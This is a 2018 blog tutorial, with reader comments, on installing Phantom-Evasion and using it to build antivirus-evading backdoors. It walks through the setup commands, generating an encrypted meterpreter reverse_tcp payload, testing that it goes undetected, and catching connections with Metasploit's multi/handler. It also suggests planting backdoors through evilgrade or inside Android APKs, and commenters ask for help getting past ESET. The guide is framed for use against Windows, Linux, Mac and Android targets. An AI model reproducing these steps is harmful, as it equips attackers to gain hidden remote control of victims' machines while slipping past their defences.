Phantom Evasion – Bypassing Anti-Virus and Hacking Windows, Linux, Mac OS X and Android

      • Posted by Rajneesh Borthakur
      • Date April 24, 2018

Most of us have heard of msfvenom and Metasploit backdoors and have tested them many times. They normally get detected by anti-virus programs such as Windows Defender. We also know about Veil-Evasion, a tool that generates backdoors that bypass most anti-virus programs, but sometimes backdoors generated by Veil are detected by several AV programs, so we have to use other tools like Empire (click here for a post on how to use Empire). Novice learners, however, can find tools like Empire a bit difficult to use and understand. Alternatively, we can use a tool called Phantom-Evasion to generate multibyte XOR-encrypted FUD payloads that are completely invisible to AVs; it is easy to install, simple to use and effective.


As Phantom-Evasion is not included in Kali, we have to install it separately. Before that, we have to manually install a Windows Python interpreter and PyInstaller so that we don't get the following errors:

Note: I strongly recommend the 64-bit version of Kali, as some dependencies of Phantom are not available for the 32-bit version, so it may still show errors there.

Step one – Installing a Windows Python interpreter:

1. Add the i386 architecture. To do this, run the following commands in your terminal:

dpkg --add-architecture i386
apt-get update

2. Install wine32 and wine64:

apt-get install wine32
apt-get install wine64

3. Now download the Python 2.7.14 installer from its website:

wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi

4. Install Python in Wine:

wine msiexec /i python-2.7.14.msi

Ignore the terminal output, select "Install for all users", keep clicking Next until the installation finishes, and click Finish at the end.

5. Navigate to the directory where Python is installed:

cd /root/.wine/drive_c/Python27

6. Use pip (bundled with this Python installer) to install PyInstaller:

wine python.exe -m pip install pyinstaller

Done! Now that everything is sorted, we can install Phantom Evasion without any errors.


Step two – Installing Phantom Evasion:

1. Optional: change directory to /opt:

cd /opt

2. Clone the Phantom project from GitHub:

git clone https://github.com/oddcod3/Phantom-Evasion.git

3. Now go to the Phantom-Evasion directory:

cd Phantom-Evasion

4. Finally, run the program; it will automatically install any missing dependencies:

Note: It will show an option to install a Monero miner to support the developer. I will leave this choice to you. If you want to do this, type y and press Enter; if you don't, type n and press Enter.

python phantom-evasion.py

If everything goes well you should see a screen similar to this (it may look a little different on your first-time installation, so don't panic; if everything shows in green, you're good to go):


Using Phantom Evasion:

Now the tool will load and you will be able to use it. You can make all kinds of backdoors for almost every platform: Windows, Linux, Mac OS X, Android, etc. You can also use custom shellcode from Veil to make a custom backdoor. The next article will cover this, stay tuned!

Let me show you an example of how this tool works:

1. Go to the location where you cloned Phantom Evasion; for me it's /opt/Phantom-Evasion:

cd /opt/Phantom-Evasion

2. Run Phantom Evasion:

python phantom-evasion.py

You will see a screen similar to this:

3. Select the Windows module (option 2) as shown in the screenshot and press Enter.

4. Now you will see a screen similar to this. I suggest you experiment with these modules and see which one works best for you; I'm going to select option 4:

5. The next screen will show you more details about this module. Press Enter to continue.

6. The next screen will ask you how to supply the shellcode. Choose option 1 (msfvenom) for now and press Enter.

7. Now it will ask you to enter the msfvenom payload you want to use.

E.g. if you want to use a 32-bit payload, type windows/meterpreter/reverse_tcp
If you want to use a 64-bit payload, type windows/x64/meterpreter/reverse_tcp

8. Set the LHOST (your local IP) and the LPORT (the listening port on which you want to receive the connections).

9. Now it will ask which encoding to use. Select whatever you prefer and hit Enter; I would recommend the 3rd or 4th one for better effectiveness. Also give an output name for your backdoor.

Finally, it will start the encoding and compiling process. Once it is completed, exit Phantom and you will find the backdoor in the same Phantom directory.

If you want to check whether it is undetectable or not, go to https://nodistribute.com, upload your file and scan it. You will find this:

Receiving Connections:

Since the backdoors use msfvenom payloads, you can listen for incoming connections using Metasploit's multi/handler module. This is covered in the 2nd part of the following video (fast forward to 9:50):

Now you are ready to use the tool, as you have probably got the idea of how to use it in general, so you can practice on Windows and other platforms as well by generating different backdoors using Phantom Evasion. You can also combine backdoors created by Phantom with other attacks, such as evilgrade. You can change the extensions and use them to exploit various Windows systems. You can also compile backdoors into existing Android APKs and use them with AhMyth (stay tuned for the next article). So the possibilities are many more; it depends on you how you use it.

Tags: Antivirus, Bypass, Kali, Metasploit, Msfvenom, Veil Evasion

      Rajneesh Borthakur

Hello!! My name is Rajneesh Borthakur, just a simple boy of 18 from a small state of India. I always favoured I.T. and penetration testing, so I always practiced and tried to improve on my own a lot. I had to drop out of college (financial reasons) and decided to study and learn online. My dream is to get into the pentesting and I.T. field and to get an entry-level job so that I can excel in it to where I can at least be my own.

I like to tinker with complicated problems and stuff, and often make something better from them. Apart from learning, pentesting and stuff, I like to make and modify different types of graphic tweaks for PC games with SweetFX, MasterEffect, ReShade etc. I also sometimes design digital art and sci-fi themes using Rainmeter and other tools and desktop enhancement widgets for Windows.

To me, life is all about experimenting and fixing problems and making/improving something new from it. I believe the more we experiment and learn, the less we know, and the more we grow our urge to know.

5 Comments

1. Sphiwokuhle
   July 16, 2018

   NoDistribute is not working..

   • Rajneesh Borthakur
     July 17, 2018

     I just checked twice; the first time it did not work, on the 2nd attempt it worked, so I can't say whether it's working or not …

2. hammad
   July 21, 2018

   Veil Evasion, Fatrat, Empire, Phantom, Metasploit are not working; their backdoors are detected by antivirus. I personally checked it by making some changes in .bat and .py files but did not get any good results. Please help, as I am using ESET NOD antivirus.

3. Hasanlk99
   June 6, 2020

   Can you direct me to use this for Android?

4. Mr.x
   July 9, 2020

   I'm getting a problem installing wine:
   Wine: Depends: wine64 (>=5.0-4) but it is not going to be installed or wine32 (>=5.0-4)
   Depends: wine64(< 5.0-4.1~) but it is not going to be installed or wine32 (5.0-4.1~)
